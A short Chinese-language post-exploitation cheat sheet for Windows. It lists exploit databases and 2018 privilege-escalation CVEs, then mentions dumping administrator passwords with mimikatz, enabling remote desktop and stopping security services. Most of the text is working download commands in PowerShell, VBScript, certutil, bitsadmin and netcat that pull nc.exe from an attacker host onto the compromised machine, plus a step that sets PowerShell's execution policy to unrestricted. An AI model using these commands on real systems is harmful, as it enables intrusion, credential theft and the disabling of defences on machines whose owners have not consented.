1. 漏洞收集 0day库
- exploit-db
 - 0da’y
 - https://securitytracker.com/
 - https://www.rapid7.com/db/modules/
 - https://cxsecurity.com/
 
2. cve-2018-8120、cve-2018-8897、cve-2018-8174
- 使用exploit进行提权
 - 使用mimikatz抓管理员密码
 - 使用命令行开启远程桌面
 - 使用账号密码连接
 
3. 停止安全软件相关服务
4. 文件传输三十六计
4.1 windows文件传输
- 使用powershell下载
- 首先在kali 的 /var/www/html放入你的exe文件比如说nc.exe
 - powershell输入如下命令
`
$p=New-Object system.net.webclient. 
 
$p.downloadfile(“http://192.168.178.200/nc.exe","nc.exe")
-  也可以将上述命令存储在ps1文件中执行,但是默认情况下是无法执行powershell脚本的,需要在管理员权限下修改配置
powershell set-executionpolicy unrestricted
2.  Visual Basic 文件下载
``` vbscript
Set args = Wscript.Arguments
Url = "http://192.168.178.200/nc.exe"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
    .type = 1 '
    .open
    .write xHttp.responseBody
    .savetofile " C:\nc.exe", 2 '
end with
cmd下执行  cscript test.vbs

由于是users组用户所以不能直接放在c盘权限不够
- nc传输
发送方cmd下执行: 
nc.exe -L -p 8888 <test.vbs
接收方执行nc.exe 192.168.1.105 8888 >test.vbs
使用certutil
certutil -urlcache -split -f http://192.168.178.200/nc.exe nc.exe使用bitsadmin
bitsadmin /transfer n http://domain/file c:\%homepath%\file
- ftp
 - Windows Share File Download
 tftp
ipc文件下载/上传/登陆